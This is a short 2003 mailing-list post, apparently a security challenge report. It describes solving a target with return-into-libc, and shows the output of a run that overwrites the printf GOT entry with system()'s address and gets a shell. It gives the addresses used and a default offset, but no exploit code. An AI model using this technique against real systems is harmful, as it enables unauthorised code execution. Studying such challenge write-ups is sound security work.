0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in fact. The challenge would have been interesting if the fopen() wasn't "a" but create and write from beginning. $ ./exploit Using system address 0x4005f531 And overwriting printf got at 0x0804971c starting by 0x08049713 sh-2.05b$ exit exit Segmentation fault default offset is 5 (could vary). spacewalker /* Say NO to target[n] exploits ! */
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 14:07:20 PDT